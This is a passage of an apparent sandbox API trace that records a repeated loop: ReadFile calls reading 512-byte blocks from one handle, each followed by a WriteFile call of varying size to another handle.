lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.362] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x326, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.363] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.363] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.364] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.364] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.365] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.365] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.366] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.366] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.367] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.368] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.368] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ea, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.369] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.369] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.370] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.370] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.371] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.371] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.372] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.372] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.373] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.373] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.374] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.374] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.375] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.375] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.376] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.376] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x275, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.377] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.377] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.378] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.378] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.379] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.379] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.380] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.380] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.381] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.381] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.382] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.382] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.383] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.383] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.384] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.384] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.385] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.385] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.386] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.386] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.387] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.387] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.388] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.388] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.389] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.389] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.390] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.391] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.391] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.392] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.392] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.393] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.393] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.394] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.394] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.395] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.395] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.396] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.396] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.397] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.397] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.398] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.398] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.399] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.399] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.400] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.400] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.401] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.401] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.402] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.402] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.403] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.403] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.406] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.409] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.409] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.410] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, 